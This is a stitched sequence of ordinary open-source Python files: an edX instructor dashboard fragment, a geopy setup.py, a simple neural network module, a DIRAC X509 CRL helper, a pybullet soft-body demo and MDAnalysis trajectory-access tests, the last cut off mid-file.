'problem_grade_report_url': reverse('problem_grade_report', kwargs={'course_id': unicode(course_key)}),
'course_has_survey': True if course.course_survey_name else False,
'course_survey_results_url': reverse('get_course_survey_results', kwargs={'course_id': unicode(course_key)}),
'export_ora2_data_url': reverse('export_ora2_data', kwargs={'course_id': unicode(course_key)}),
}
return section_data
def null_applicable_aside_types(block): # pylint: disable=unused-argument
"""
get_aside method for monkey-patching into applicable_aside_types
while rendering an HtmlDescriptor for email text editing. This returns
an empty list.
"""
return []
def _section_send_email(course, access):
""" Provide data for the corresponding bulk email section """
course_key = course.id
# Monkey-patch applicable_aside_types to return no asides for the duration of this render
with patch.object(course.runtime, 'applicable_aside_types', null_applicable_aside_types):
# This HtmlDescriptor is only being used to generate a nice text editor.
html_module = HtmlDescriptor(
course.system,
DictFieldData({'data': ''}),
ScopeIds(None, None, None, course_key.make_usage_key('html', 'fake'))
)
fragment = course.system.render(html_module, 'studio_view')
fragment = wrap_xblock(
'LmsRuntime', html_module, 'studio_view', fragment, None,
extra_data={"course-id": unicode(course_key)},
usage_id_serializer=lambda usage_id: quote_slashes(unicode(usage_id)),
# Generate a new request_token here at random, because this module isn't connected to any other
# xblock rendering.
request_token=uuid.uuid1().get_hex()
)
cohorts = []
if is_course_cohorted(course_key):
cohorts = get_course_cohorts(course)
course_modes = []
if not VerifiedTrackCohortedCourse.is_verified_track_cohort_enabled(course_key):
course_modes = CourseMode.modes_for_course(course_key, include_expired=True, only_selectable=False)
email_editor = fragment.content
section_data = {
'section_key': 'send_email',
'section_display_name': _('Email'),
'access': access,
'send_email': reverse('send_email', kwargs={'course_id': unicode(course_key)}),
'editor': email_editor,
'cohorts': cohorts,
'course_modes': course_modes,
'default_cohort_name': DEFAULT_COHORT_NAME,
'list_instructor_tasks_url': reverse(
'list_instructor_tasks', kwargs={'course_id': unicode(course_key)}
),
'email_background_tasks_url': reverse(
'list_background_email_tasks', kwargs={'course_id': unicode(course_key)}
),
'email_content_history_url': reverse(
'list_email_content', kwargs={'course_id': unicode(course_key)}
),
}
return section_data
def _get_dashboard_link(course_key):
""" Construct a URL to the external analytics dashboard """
analytics_dashboard_url = '{0}/courses/{1}'.format(settings.ANALYTICS_DASHBOARD_URL, unicode(course_key))
link = HTML(u"<a href=\"{0}\" target=\"_blank\">{1}</a>").format(
analytics_dashboard_url, settings.ANALYTICS_DASHBOARD_NAME
)
return link
def _section_analytics(course, access):
""" Provide data for the corresponding dashboard section """
section_data = {
'section_key': 'instructor_analytics',
'section_display_name': _('Analytics'),
'access': access,
'course_id': unicode(course.id),
}
return section_data
def _section_metrics(course, access):
"""Provide data for the corresponding dashboard section """
course_key = course.id
section_data = {
'section_key': 'metrics',
'section_display_name': _('Metrics'),
'access': access,
'course_id': unicode(course_key),
'sub_section_display_name': get_section_display_name(course_key),
'section_has_problem': get_array_section_has_problem(course_key),
'get_students_opened_subsection_url': reverse('get_students_opened_subsection'),
'get_students_problem_grades_url': reverse('get_students_problem_grades'),
'post_metrics_data_csv_url': reverse('post_metrics_data_csv'),
}
return section_data
def _section_open_response_assessment(request, course, openassessment_blocks, access):
"""Provide data for the corresponding dashboard section """
course_key = course.id
ora_items = []
parents = {}
for block in openassessment_blocks:
block_parent_id = unicode(block.parent)
result_item_id = unicode(block.location)
if block_parent_id not in parents:
parents[block_parent_id] = modulestore().get_item(block.parent)
ora_items.append({
'id': result_item_id,
'name': block.display_name,
'parent_id': block_parent_id,
'parent_name': parents[block_parent_id].display_name,
'staff_assessment': 'staff-assessment' in block.assessment_steps,
'url_base': reverse('xblock_view', args=[course.id, block.location, 'student_view']),
'url_grade_available_responses': reverse('xblock_view', args=[course.id, block.location,
'grade_available_responses_view']),
})
openassessment_block = openassessment_blocks[0]
block, __ = get_module_by_usage_id(
request, unicode(course_key), unicode(openassessment_block.location),
disable_staff_debug_info=True, course=course
)
section_data = {
'fragment': block.render('ora_blocks_listing_view', context={
'ora_items': ora_items,
'ora_item_view_enabled': settings.FEATURES.get('ENABLE_XBLOCK_VIEW_ENDPOINT', False)
}),
'section_key': 'open_response_assessment',
'section_display_name': _('Open Responses'),
'access': access,
'course_id': unicode(course_key),
}
return section_data
def is_ecommerce_course(course_key):
"""
Checks if the given course is an e-commerce course or not, by checking its SKU value from
CourseMode records for the course
"""
sku_count = len([mode.sku for mode in CourseMode.modes_for_course(course_key) if mode.sku])
return sku_count > 0
|
philanthropy-u/edx-platform
|
lms/djangoapps/instructor/views/instructor_dashboard.py
|
Python
|
agpl-3.0
| 36,922
|
[
"VisIt"
] |
ba5740853f52f8f4891c5f82cd739a5c5a6b5e5c67e1add671732895bb564cc8
|
"""A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
from geopy import __version__, __name__, __author__
name = 'pivotal_' + __name__
base_url = 'https://github.com/pivotal-energy-solutions/geopy'
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
# Arguments marked as "Required" below must be included for upload to PyPI.
# Fields marked as "Optional" may be commented out.
setup(
# This is the name of your project. The first time you publish this
# package, this name will be registered for you. It will determine how
# users can install this project, e.g.:
#
# $ pip install sampleproject
#
# And where it will live on PyPI: https://pypi.org/project/sampleproject/
#
# There are some restrictions on what makes a valid project name
# specification here:
# https://packaging.python.org/specifications/core-metadata/#name
name=name, # Required
# Versions should comply with PEP 440:
# https://www.python.org/dev/peps/pep-0440/
#
# For a discussion on single-sourcing the version across setup.py and the
# project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version=__version__, # Required
# This is a one-line description or tagline of what your project does. This
# corresponds to the "Summary" metadata field:
# https://packaging.python.org/specifications/core-metadata/#summary
description='Python Geocoding Toolbox', # Required
# This is an optional longer description of your project that represents
# the body of text which users will see when they visit PyPI.
#
# Often, this is the same as your README, so you can just read it in from
# that file directly (as we have already done above)
#
# This field corresponds to the "Description" metadata field:
# https://packaging.python.org/specifications/core-metadata/#description-optional
long_description=long_description, # Optional
# Denotes that our long_description is in Markdown; valid values are
# text/plain, text/x-rst, and text/markdown
#
# Optional if long_description is written in reStructuredText (rst) but
# required for plain-text or Markdown; if unspecified, "applications should
# attempt to render [the long_description] as text/x-rst; charset=UTF-8 and
# fall back to text/plain if it is not valid rst" (see link below)
#
# This field corresponds to the "Description-Content-Type" metadata field:
# https://packaging.python.org/specifications/core-metadata/#description-content-type-optional
long_description_content_type='text/markdown', # Optional (see note above)
# This should be a valid link to your project's main homepage.
#
# This field corresponds to the "Home-Page" metadata field:
# https://packaging.python.org/specifications/core-metadata/#home-page-optional
url=base_url, # Optional
download_url='{0}/archive/{1}.tar.gz'.format(base_url, __version__),
# This should be your name or the name of the organization which owns the
# project.
author=__author__, # Optional
# This should be a valid email address corresponding to the author listed
# above.
author_email='exogen@gmail.com', # Optional
# Classifiers help users find your project by categorizing it.
#
# For a list of valid classifiers, see
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[ # Optional
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
# Pick your license as you wish
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
"Topic :: Scientific/Engineering :: GIS",
"Topic :: Software Development :: Libraries :: Python Modules"
],
# This field adds keywords for your project which will appear on the
# project page. What does your project relate to?
#
# Note that this is a string of words separated by whitespace, not a list.
keywords='geocoding django', # Optional
# You can just specify package directories manually here if your project is
# simple. Or you can use find_packages().
#
# Alternatively, if you just want to distribute a single Python file, use
# the `py_modules` argument instead as follows, which will expect a file
# called `my_module.py` to exist:
#
# py_modules=["my_module"],
#
packages=find_packages(exclude=['contrib', 'docs', 'tests']), # Required
# This field lists other packages that your project depends on to run.
# Any package you put here will be installed by pip when your project is
# installed, so they must be valid existing projects.
#
# For an analysis of "install_requires" vs pip's requirements files see:
# https://packaging.python.org/en/latest/requirements.html
# install_requires=['peppercorn'], # Optional
# List additional groups of dependencies here (e.g. development
# dependencies). Users will be able to install these using the "extras"
# syntax, for example:
#
# $ pip install sampleproject[dev]
#
# Similar to `install_requires` above, these must be valid existing
# projects.
# extras_require={ # Optional
# 'dev': ['check-manifest'],
# 'test': ['coverage'],
# },
# If there are data files included in your packages that need to be
# installed, specify them here.
#
# MANIFEST.in as well.
# package_data={ # Optional
# 'sample': ['package_data.dat'],
# },
#
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files
#
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
# data_files=[('my_data', ['data/data_file'])], # Optional
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# `pip` to create the appropriate form of executable for the target
# platform.
#
# For example, the following would provide a command called `sample` which
# executes the function `main` from this package when invoked:
# entry_points={ # Optional
# 'console_scripts': [
# 'sample=sample:main',
# ],
# },
# List additional URLs that are relevant to your project as a dict.
#
# This field corresponds to the "Project-URL" metadata fields:
# https://packaging.python.org/specifications/core-metadata/#project-url-multiple-use
#
# Examples listed include a pattern for specifying where the package tracks
# issues, where the source is hosted, where to say thanks to the package
# maintainers, and where to support the project financially. The key is
# what's used to render the link text on PyPI.
project_urls={ # Optional
'Bug Reports': '{}/issues'.format(base_url),
'Say Thanks!': 'https://saythanks.io/to/rh0dium',
'Original Source': 'https://github.com/geopy/geopy',
},
)
|
pivotal-energy-solutions/geopy
|
setup.py
|
Python
|
mit
| 8,055
|
[
"VisIt"
] |
2da093a5ea6ca78c45f6a8622980d3fe58259cb2138b33058436ee8bb6fe2e3e
|
# This neural module provides the fundamentals of a
# neural network. The classes implement the standard,
# bread-and-butter pieces of a plain backpropagation
# supervised learning network.
#
# It works out of the box for basic use, but to extend it
# beyond the plain standard, import this module and
# subclass the class you need (e.g. neural.Neuron).
#
# Best practice: put those extensions in the package neural.ext.
# Array of neuron/node-value/gradient pairs:
# [
#     [
#         0: Neuron/Node object of concern,
#         1: Value/Gradient
#     ],
#     ...
# ]
#
# Pairs are used instead of a dict keyed by the
# neuron/node objects themselves.
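# Illustrative example of the pair layout (hypothetical objects):
#
#   pairs = [[some_neuron, 0.5], [some_node, -0.1]]
#   for obj, value_or_gradient in pairs:
#       ...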
import random
# Standard digital-output perceptron
# IN list of NeuronInputs
# OUT list of Nodes
class Neuron:
    def __init__(self, inputs=None, outputs=None):
        # Avoid shared mutable default arguments.
        self.inputs = inputs if inputs is not None else []
        self.outputs = outputs if outputs is not None else []
def output(self):
sum = 0
for input in self.inputs:
sum += input.weight * input.input.value
return self.activation(sum)
def updateOutput(self):
outputValue = self.output()
for output in self.outputs:
output.value = outputValue
def inputGradient(self, input):
neuroninput_gradient = self.activationGradient() # times 1
return {"next": neuroninput_gradient * input.weight,
"weight": neuroninput_gradient * input.input.value}
def inputGradients(self):
temp = list()
for input in self.inputs:
temp.append([input, self.inputGradient(input)])
return temp
# Input gradients
# "next": Gradient of external node that inputs to the neuron (for backpropogation)
# "weight": Gradient of weight of the neuron input (for changing the weight)
def updateInputGradients(self):
for input in self.inputGradients():
input[0].input.gradient = input[1]["next"]
input[0].weight_gradient = input[1]["weight"]
def activation(self, sum):
return 1 if sum >= 1 else 0
    def activationGradient(self):
        # Sum the gradients flowing back from all output nodes.
        total = 0
        for output in self.outputs:
            total += output.gradient
        return total
# if output is 1 and sum > 0:
# return 0
# elif output is not 1 and sum > 0:
# return sum
# elif output is 0 and sum < 0:
# return 0
# elif output is not 0 and sum < 0:
# return sum
# else:
# return 0 # sum == 0
# Standard weighted perceptron input
# IN Node (External of owner neuron)
# Must only belong to one neuron
class NeuronInput:
def __init__(self, input = None, weight = 0, weight_gradient = 0):
self.input = input
self.weight = weight
self.weight_gradient = weight_gradient
# Standard "wire" with standard backpropogation learning gradient
# NEXT Neuron
# PREV Neuron
class Node:
def __init__(self, value = 0, gradient = 0, nextInput = None, prevOutput = None):
self.value = value
self.gradient = gradient
self.nextInput = nextInput
self.prevOutput = prevOutput
# Standard layered network with inputs, outputs and hidden layers
class Network:
    def __init__(self, inputs=None, outputs=None, hiddens=None):
        # Avoid shared mutable default arguments.
        self.inputs = inputs if inputs is not None else []
        self.outputs = outputs if outputs is not None else []
        self.hiddens = hiddens if hiddens is not None else []
def output(self):
temp = list()
for input in self.inputs:
temp.append(self.forward(input)) # To be optimized
return temp
    # Returns a [terminal neuron, output value] pair for the output
    # neuron reached by propagating forward from `neuron`.
    def forward(self, neuron):
        neuron.updateOutput()
        for output in neuron.outputs:
            if output.nextInput is not None:  # A node with no next input stops forward propagation.
                return self.forward(output.nextInput)
        return [neuron, neuron.output()]
# Standard backpropagation teacher that drives each output toward one specific value.
# Note that although multiple output nodes per logical output are supported,
# they will all be driven toward the same value.
class Teacher:
def __init__(self, network = None, step = 0.01):
self.network = network
self.step = step
def backward(self, neuron):
neuron.updateInputGradients()
for input in neuron.inputs:
input.weight += self.step * input.weight_gradient
if input.input.prevOutput is not None:
input.input.value += self.step * input.input.gradient
                self.backward(input.input.prevOutput)
def teachStep(self, nodeGradients):
for nodeGradient in nodeGradients:
nodeGradient[0].gradient = nodeGradient[1]
if nodeGradient[0].prevOutput is not None:
self.backward(nodeGradient[0].prevOutput) # To be optimized
    # Teaching lesson format:
    #
    # [
    #     {
    #         "inputs": [
    #             [input_node, input_value],
    #             ...
    #         ],
    #         "outputs": [
    #             [output_node, desired_output_value],
    #             ...
    #         ]
    #     },
    #     ...
    # ]
def teach(self, values, steps):
for i in range(1, steps):
value = random.choice(values)
for inputNode in value["inputs"]:
inputNode[0].value = inputNode[1]
self.network.output()
temp = list()
for outputNode in value["outputs"]:
                desired, actual = outputNode[1], outputNode[0].value
                error_sign = 1 if desired > actual else (-1 if desired < actual else 0)
                temp.append([outputNode[0], error_sign])
self.teachStep(temp)
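
# Minimal usage sketch (hypothetical wiring: it illustrates the intended
# object graph, not a tested configuration):
if __name__ == "__main__":
    in_node = Node(value=1)
    out_node = Node()
    neuron = Neuron(inputs=[NeuronInput(input=in_node, weight=0.5)],
                    outputs=[out_node])
    in_node.nextInput = neuron
    out_node.prevOutput = neuron
    network = Network(inputs=[neuron], outputs=[out_node])
    teacher = Teacher(network=network, step=0.01)
    # One lesson: drive the output toward 1 when the input is 1.
    lessons = [{"inputs": [[in_node, 1]], "outputs": [[out_node, 1]]}]
    teacher.teach(lessons, steps=100)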
|
limdingwen/neural
|
neural.py
|
Python
|
mit
| 4,992
|
[
"NEURON"
] |
726e7d2035fa374d8cbdce9741da0a48e0e1b7a7d4432c0a28cc2f214fef7df2
|
""" X509CRL is a class for managing X509CRL
This class is used to manage the revoked certificates....
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
__RCSID__ = "$Id$"
import stat
import os
import tempfile
import re
import datetime
import M2Crypto
from DIRAC import S_OK, S_ERROR
from DIRAC.Core.Utilities import DErrno
# pylint: disable=broad-except
class X509CRL(object):
    def __init__(self, cert=None):
        self.__pemData = b""
        if cert:
            self.__loadedCert = True
            self.__revokedCert = cert
        else:
            self.__loadedCert = False

    @classmethod
    def instanceFromFile(cls, crlLocation):
        """Instantiate an X509CRL from a file"""
        crl = cls()
        result = crl.loadCRLFromFile(crlLocation)
        if not result["OK"]:
            return result
        return S_OK(crl)

    def loadCRLFromFile(self, crlLocation):
        """
        Load an X509 CRL from a PEM file
        Return : S_OK / S_ERROR
        """
        self.__loadedCert = False
        try:
            self.__revokedCert = M2Crypto.X509.load_crl(crlLocation)
        except Exception as e:
            return S_ERROR(DErrno.ECERTREAD, "%s" % repr(e).replace(",)", ")"))
        self.__loadedCert = True
        with open(crlLocation, "rb") as crlFile:
            pemData = crlFile.read()
        self.__pemData = pemData
        return S_OK()

    def __bytes__(self):
        if not self.__loadedCert:
            return b"No certificate loaded"
        return self.__pemData

    def __str__(self):
        return bytes(self).decode()

    def dumpAllToString(self):
        """
        Dump all to string
        """
        if not self.__loadedCert:
            return S_ERROR(DErrno.ECERTREAD, "No certificate loaded")
        return S_OK(self.__pemData)

    def dumpAllToFile(self, filename=False):
        """
        Dump all to file. If no filename is specified, a temporary one will be created
        """
        if not self.__loadedCert:
            return S_ERROR("No certificate loaded")
        try:
            if not filename:
                fd, filename = tempfile.mkstemp()
                os.close(fd)
            with open(filename, "wb") as fd:
                fd.write(self.__pemData)
        except Exception as e:
            return S_ERROR(DErrno.EWF, "%s: %s" % (filename, repr(e).replace(",)", ")")))
        try:
            os.chmod(filename, stat.S_IRUSR | stat.S_IWUSR)
        except Exception as e:
            return S_ERROR(DErrno.ESPF, "%s: %s" % (filename, repr(e).replace(",)", ")")))
        return S_OK(filename)

    def hasExpired(self):
        if not self.__loadedCert:
            return S_ERROR("No certificate loaded")
        # XXX It should be done better, for now M2Crypto doesn't offer access to fields like Next Update
        txt = self.__revokedCert.as_text()
        pattern = r"Next Update: (?P<nextUpdate>.*)\n"
        dateStr = re.search(pattern.encode("utf-8"), txt).group("nextUpdate")
        # The regex match against as_text() yields bytes, while strptime needs str
        nextUpdate = datetime.datetime.strptime(dateStr.decode("utf-8"), "%b %d %H:%M:%S %Y GMT")
        return S_OK(datetime.datetime.now() > nextUpdate)

    def getIssuer(self):
        if not self.__loadedCert:
            return S_ERROR("No certificate loaded")
        # XXX It should be done better, for now M2Crypto doesn't offer access to fields like Issuer
        txt = self.__revokedCert.as_text()
        pattern = r"Issuer: (?P<issuer>.*)\n"
        return S_OK(re.search(pattern.encode("utf-8"), txt).group("issuer"))

    def __repr__(self):
        repStr = "<X509CRL"
        if self.__loadedCert:
            repStr += ""  # self.__revokedCert.get_issuer().one_line() # Why issuer?! XXX
        repStr += ">"
        return repStr
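# Hedged usage sketch (editor's addition, not part of the original module):
# exercises the S_OK/S_ERROR result convention used above. The CRL path is
# made up for illustration.
if __name__ == "__main__":
    result = X509CRL.instanceFromFile("/tmp/example-crl.pem")  # assumed path
    if result["OK"]:
        crl = result["Value"]
        expired = crl.hasExpired()
        if expired["OK"]:
            print("CRL expired:", expired["Value"])
    else:
        print("Could not load CRL:", result["Message"])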
|
ic-hep/DIRAC
|
src/DIRAC/Core/Security/m2crypto/X509CRL.py
|
Python
|
gpl-3.0
| 3,804
|
[
"DIRAC"
] |
fd1e7367a9f1aa072d2a6a29f30f063e426b18633a2cd9d6be1ae5f715f3ee6f
|
import pybullet as p
from time import sleep
import pybullet_data

physicsClient = p.connect(p.GUI)
p.setAdditionalSearchPath(pybullet_data.getDataPath())
p.setGravity(0, 0, -10)
planeId = p.loadURDF("plane.urdf", [0, 0, -2])
boxId = p.loadURDF("cube.urdf", [0, 3, 2], useMaximalCoordinates=True)
bunnyId = p.loadSoftBody("bunny.obj")  # a .vtk tetrahedral mesh also works here
#meshData = p.getMeshData(bunnyId)
#print("meshData=",meshData)
#p.loadURDF("cube_small.urdf", [1, 0, 1])
useRealTimeSimulation = 1

if useRealTimeSimulation:
    p.setRealTimeSimulation(1)

print(p.getDynamicsInfo(planeId, -1))
#print(p.getDynamicsInfo(bunnyId, 0))
print(p.getDynamicsInfo(boxId, -1))
p.changeDynamics(boxId, -1, mass=10)

while p.isConnected():
    p.setGravity(0, 0, -10)
    if useRealTimeSimulation:
        sleep(0.01)  # Time in seconds.
        #p.getCameraImage(320,200,renderer=p.ER_BULLET_HARDWARE_OPENGL )
    else:
        p.stepSimulation()
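# Hedged variant (editor's addition): the same scene stepped manually instead
# of in real time, sampling the soft body's deformed vertices via
# p.getMeshData -- the call the original leaves commented out above, which
# returns (num_vertices, vertex_positions) in the pybullet examples.
#
# p.setRealTimeSimulation(0)
# for _ in range(240):  # ~1 second at the default 240 Hz timestep
#     p.stepSimulation()
# numVerts, verts = p.getMeshData(bunnyId)
# print("bunny has", numVerts, "vertices; first:", verts[0])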
|
nrz/ylikuutio
|
external/bullet3/examples/pybullet/examples/load_soft_body.py
|
Python
|
agpl-3.0
| 902
|
[
"VTK"
] |
1d0eb975823a3ef5f4f0f50f73aea6b05db19e794abf64aa18de116c85cd224d
|
# -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding:utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4 fileencoding=utf-8
#
# MDAnalysis --- http://www.mdanalysis.org
# Copyright (c) 2006-2016 The MDAnalysis Development Team and contributors
# (see the file AUTHORS for the full list of names)
#
# Released under the GNU Public Licence, v2 or any higher version
#
# Please cite your use of MDAnalysis in published work:
#
# R. J. Gowers, M. Linke, J. Barnoud, T. J. E. Reddy, M. N. Melo, S. L. Seyler,
# D. L. Dotson, J. Domanski, S. Buchoux, I. M. Kenney, and O. Beckstein.
# MDAnalysis: A Python package for the rapid analysis of molecular dynamics
# simulations. In S. Benthall and S. Rostrup editors, Proceedings of the 15th
# Python in Science Conference, pages 102-109, Austin, TX, 2016. SciPy.
#
# N. Michaud-Agrawal, E. J. Denning, T. B. Woolf, and O. Beckstein.
# MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics Simulations.
# J. Comput. Chem. 32 (2011), 2319--2327, doi:10.1002/jcc.21787
#
from __future__ import division, absolute_import
import numpy as np
from numpy.testing import (
    assert_,
    assert_almost_equal,
    assert_array_equal,
    assert_array_almost_equal,
    assert_equal,
    assert_raises,
)
from nose.plugins.attrib import attr
from MDAnalysisTests import make_Universe
from MDAnalysisTests.datafiles import (
    COORDINATES_XYZ, COORDINATES_TRR,
    GRO, TRR,
    GRO_velocity, PDB_xvf, TRR_xvf
)
import MDAnalysis
from MDAnalysis import NoDataError
def assert_not_view(arr):
    assert_(arr.flags['OWNDATA'])


def assert_correct_errormessage(func, var):
    errmsg = "Timestep does not contain {}".format(var)
    try:
        func[0](*func[1:])
    except NoDataError as e:
        assert_(errmsg in e.args[0])
    else:
        raise AssertionError("NoDataError was not raised")
class TestAtomGroupTrajAccess(object):
    """
    For AtomGroup and Atom access:
      if present:
        - check return type
        - check dtype of array
        - check not a view of original (should always be copy!)
        - check the actual values returned
      if not present in trajectory:
        - check we get a NoDataError
        - check the error message of the NoDataError

    For AtomGroup and Atom setting:
      if present:
        - check AtomGroup value is updated
        - check value in master Timestep object is updated
      if not present, check we get a proper NoDataError on setting
    """
    @staticmethod
    def _check_atomgroup_positions_access(u, pos):
        ag = u.atoms[10:20]
        ag_pos = ag.positions
        assert_(isinstance(ag_pos, np.ndarray))
        assert_(ag_pos.dtype == np.float32)
        assert_not_view(ag_pos)
        assert_array_equal(ag_pos, u.trajectory.ts.positions[10:20])

    @staticmethod
    def _check_atomgroup_velocities_access(u, vel):
        ag = u.atoms[10:20]
        if vel:
            ag_vel = ag.velocities
            assert_(isinstance(ag_vel, np.ndarray))
            assert_(ag_vel.dtype == np.float32)
            assert_not_view(ag_vel)
            assert_array_equal(ag_vel, u.trajectory.ts.velocities[10:20])
        else:
            assert_raises(NoDataError, getattr, ag, 'velocities')
            assert_correct_errormessage((getattr, ag, 'velocities'), 'velocities')

    @staticmethod
    def _check_atomgroup_forces_access(u, force):
        ag = u.atoms[10:20]
        if force:
            ag_for = ag.forces
            assert_(isinstance(ag_for, np.ndarray))
            assert_(ag_for.dtype == np.float32)
            assert_not_view(ag_for)
            assert_array_equal(ag_for, u.trajectory.ts.forces[10:20])
        else:
            assert_raises(NoDataError, getattr, ag, 'forces')
            assert_correct_errormessage((getattr, ag, 'forces'), 'forces')

    @staticmethod
    def _check_atom_position_access(u, pos):
        at = u.atoms[55]
        at_pos = at.position
        assert_(isinstance(at_pos, np.ndarray))
        assert_(at_pos.dtype == np.float32)
        assert_not_view(at_pos)
        assert_array_equal(at_pos, u.trajectory.ts.positions[55])

    @staticmethod
    def _check_atom_velocity_access(u, vel):
        at = u.atoms[55]
        if vel:
            at_vel = at.velocity
            assert_(isinstance(at_vel, np.ndarray))
            assert_(at_vel.dtype == np.float32)
            assert_not_view(at_vel)
            assert_array_equal(at_vel, u.trajectory.ts.velocities[55])
        else:
            assert_raises(NoDataError, getattr, at, 'velocity')
            assert_correct_errormessage((getattr, at, 'velocity'), 'velocities')

    @staticmethod
    def _check_atom_force_access(u, force):
        at = u.atoms[55]
        if force:
            at_for = at.force
            assert_(isinstance(at_for, np.ndarray))
            assert_(at_for.dtype == np.float32)
            assert_not_view(at_for)
            assert_array_equal(at_for, u.trajectory.ts.forces[55])
        else:
            assert_raises(NoDataError, getattr, at, 'force')
            assert_correct_errormessage((getattr, at, 'force'), 'forces')

    @staticmethod
    def _check_atomgroup_positions_setting(u, pos):
        ag = u.atoms[[101, 107, 109]]
        new = np.array([[72.4, 64.5, 74.7],
                        [124.6, 15.6, -1.11],
                        [25.2, -66.6, 0]])
        ag.positions = new
        assert_array_almost_equal(ag.positions, new, decimal=5)
        assert_array_almost_equal(u.trajectory.ts.positions[[101, 107, 109]], new, decimal=5)

    @staticmethod
    def _check_atomgroup_velocities_setting(u, vel):
        ag = u.atoms[[101, 107, 109]]
        new = np.array([[72.4, 64.5, 74.7],
                        [124.6, 15.6, -1.11],
                        [25.2, -66.6, 0]]) + 0.1
        if vel:
            ag.velocities = new
            assert_array_almost_equal(ag.velocities, new, decimal=5)
            assert_array_almost_equal(u.trajectory.ts.velocities[[101, 107, 109]], new, decimal=5)
        else:
            assert_raises(NoDataError, setattr, ag, 'velocities', new)
            assert_correct_errormessage((setattr, ag, 'velocities', new), 'velocities')

    @staticmethod
    def _check_atomgroup_forces_setting(u, force):
        ag = u.atoms[[101, 107, 109]]
        new = np.array([[72.4, 64.5, 74.7],
                        [124.6, 15.6, -1.11],
                        [25.2, -66.6, 0]]) + 0.2
        if force:
            ag.forces = new
            assert_array_almost_equal(ag.forces, new, decimal=5)
            assert_array_almost_equal(u.trajectory.ts.forces[[101, 107, 109]], new, decimal=5)
        else:
            assert_raises(NoDataError, setattr, ag, 'forces', new)
            assert_correct_errormessage((setattr, ag, 'forces', new), 'forces')

    @staticmethod
    def _check_atom_position_setting(u, pos):
        at = u.atoms[94]
        new = np.array([58.3, -10.1, 0.001])
        at.position = new
        assert_array_almost_equal(at.position, new, decimal=5)
        assert_array_almost_equal(u.trajectory.ts.positions[94], new, decimal=5)

    @staticmethod
    def _check_atom_velocity_setting(u, vel):
        at = u.atoms[94]
        new = np.array([58.3, -10.1, 0.001]) + 0.1
        if vel:
            at.velocity = new
            assert_array_almost_equal(at.velocity, new, decimal=5)
            assert_array_almost_equal(u.trajectory.ts.velocities[94], new, decimal=5)
        else:
            assert_raises(NoDataError, setattr, at, 'velocity', new)
            assert_correct_errormessage((setattr, at, 'velocity', new), 'velocities')

    @staticmethod
    def _check_atom_force_setting(u, force):
        at = u.atoms[94]
        new = np.array([58.3, -10.1, 0.001]) + 0.2
        if force:
            at.force = new
            assert_array_almost_equal(at.force, new, decimal=5)
            assert_array_almost_equal(u.trajectory.ts.forces[94], new, decimal=5)
        else:
            assert_raises(NoDataError, setattr, at, 'force', new)
            assert_correct_errormessage((setattr, at, 'force', new), 'forces')

    def test_all(self):
        # All combinations of which trajectory attributes we have;
        # positions are always present.
        for pos, vel, force in (
                (True, False, False),
                (True, True, False),
                (True, False, True),
                (True, True, True),
        ):
            u = make_Universe(trajectory=pos, velocities=vel, forces=force)
            # AtomGroup access
            yield self._check_atomgroup_positions_access, u, pos
            yield self._check_atomgroup_velocities_access, u, vel
            yield self._check_atomgroup_forces_access, u, force
            # Atom access
            yield self._check_atom_position_access, u, pos
            yield self._check_atom_velocity_access, u, vel
            yield self._check_atom_force_access, u, force
            # AtomGroup setting
            yield self._check_atomgroup_positions_setting, u, pos
            yield self._check_atomgroup_velocities_setting, u, vel
            yield self._check_atomgroup_forces_setting, u, force
            # Atom setting
            yield self._check_atom_position_setting, u, pos
            yield self._check_atom_velocity_setting, u, vel
            yield self._check_atom_force_setting, u, force
class TestAtom_ForceVelocity(object):
    def setUp(self):
        self.u = MDAnalysis.Universe(PDB_xvf, TRR_xvf)
        self.a = self.u.atoms[0]

    def tearDown(self):
        del self.u
        del self.a

    def test_atom_force_get(self):
        assert_equal(self.a.force, self.u.atoms.forces[0])

    def test_atom_velocity_get(self):
        assert_equal(self.a.velocity, self.u.atoms.velocities[0])

    def test_atom_force_set(self):
        ref = np.arange(3)
        self.a.force = ref
        assert_equal(self.a.force, ref)
        assert_equal(self.u.atoms.forces[0], ref)

    def test_atom_velocity_set(self):
        ref = np.arange(3)
        self.a.velocity = ref
        assert_equal(self.a.velocity, ref)
        assert_equal(self.u.atoms.velocities[0], ref)

    def test_pos_iteration(self):
        ag = self.u.atoms[[0]]
        val = np.array([self.a.position for ts in self.u.trajectory])
        ref = np.array([ag.positions[0] for ts in self.u.trajectory])
        assert_array_equal(val, ref)

    def test_vel_iteration(self):
        ag = self.u.atoms[[0]]
        val = np.array([self.a.velocity for ts in self.u.trajectory])
        ref = np.array([ag.velocities[0] for ts in self.u.trajectory])
        assert_array_equal(val, ref)

    def test_for_iteration(self):
        ag = self.u.atoms[[0]]
        val = np.array([self.a.force for ts in self.u.trajectory])
        ref = np.array([ag.forces[0] for ts in self.u.trajectory])
        assert_array_equal(val, ref)
class TestGROVelocities(object):
    def setUp(self):
        # reference velocities for the full 6-atom test case:
        self.reference_velocities = np.array(
            [[-101.227, -0.57999998, 0.43400002],
             [8.08500004, 3.19099998, -7.79099989],
             [-9.04500008, -26.46899986, 13.17999935],
             [2.51899981, 3.1400001, -1.73399997],
             [-10.64100075, -11.34899998, 0.257],
